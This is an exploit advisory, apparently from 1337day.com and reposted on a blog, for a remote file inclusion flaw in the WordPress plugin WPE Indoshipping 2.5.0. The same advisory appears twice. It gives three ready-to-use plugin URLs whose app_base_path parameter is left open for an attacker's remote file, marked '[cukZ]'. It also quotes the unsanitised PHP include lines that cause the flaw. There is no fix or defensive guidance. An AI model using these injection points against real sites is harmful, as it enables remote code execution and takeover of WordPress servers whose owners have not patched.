Wordpress Plugin WPE Indoshipping Remote File Inclusion
```========================================================
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
```========================================================
|
| [ Vulnerable ]
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
|
| [!] wpe_indoshipping.php
| -include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
| -include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
| -include $app_base_path.'admin/admin-functions.php';
| -include $app_base_path.'admin/shipping-manager.php';
| -include $app_base_path.'admin/form-builder.php';
| -include $app_base_path.'admin/tools.php';
| -include $app_base_path.'assets/readme.html';
|
# F7370C7E850A2BBF 1337day.com [2013-11-27] 1098BDC6E5875201 #
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
```========================================================
|
| [ Vulnerable ]
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
|
| [!] wpe_indoshipping.php
| -include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
| -include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
| -include $app_base_path.'admin/admin-functions.php';
| -include $app_base_path.'admin/shipping-manager.php';
| -include $app_base_path.'admin/form-builder.php';
| -include $app_base_path.'admin/tools.php';
| -include $app_base_path.'assets/readme.html';
|
# F7370C7E850A2BBF 1337day.com [2013-11-27] 1098BDC6E5875201 #
Labels: Exploit
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home